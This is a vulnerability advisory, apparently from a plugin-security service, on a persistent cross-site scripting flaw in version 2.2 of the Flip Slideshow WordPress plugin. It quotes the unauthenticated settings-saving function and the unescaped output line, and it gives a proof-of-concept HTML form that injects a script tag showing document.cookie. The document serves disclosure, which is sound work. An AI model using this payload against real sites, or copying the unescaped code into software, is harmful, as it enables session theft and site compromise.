Persistent Cross-Site Scripting (XSS) Vulnerability in Flip Slideshow
The Flip Slideshow plugin has a persistent cross-site scripting (XSS) vulnerability (and possibly other security issues) as of version 2.2.
Due to a issue with code shared among several plugins, which we first found in the Vertical Slideshow plugin, functions intended for Administrator level users in this plugin are accessible to anyone (even if they are not logged in). One of those is save_flp_settings(), which saves values for the plugin’s settings:
133 134 135 136 137 138 139 140 141 142 143 144 145 | public function save_flp_settings() { $ops = array(); foreach($_POST['settings'] as $key => $value) { $ops[$key] = trim($value); } update_option('flp_settings', $ops); /* insert xml code part */ } |
When the values are outputted on the plugin’s settings page, /wp-admin/admin.php?page=flipslideshow_settings, through the file /html/settings.php they are not escaped. For example, the value for “settings[bannerWidth]” is set on line 13:
13 | <td><input type="text" name="settings[bannerWidth]" value="<?php print @$ops['bannerWidth']; ?>" /></td> |
Proof of Concept
The following proof of concept will cause an alert box with any accessible cookies to be shown on the page /wp-admin/admin.php?page=flipslideshow_settings.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <head> </head> <body> <form action="http://[path to WordPress]/wp-admin/admin.php?page=flipslideshow_settings" method="post"> <input type="hidden" name="task" value="save_flp_settings" /> <input type="hidden" name="settings[bannerWidth]" value='"><script>alert(document.cookie);</script>' /> <input type="submit" name="submit" value="Submit" /> </form> </body> </html>
Timeline
- 6/7/2016 – WordPress.org Plugin Directory notified.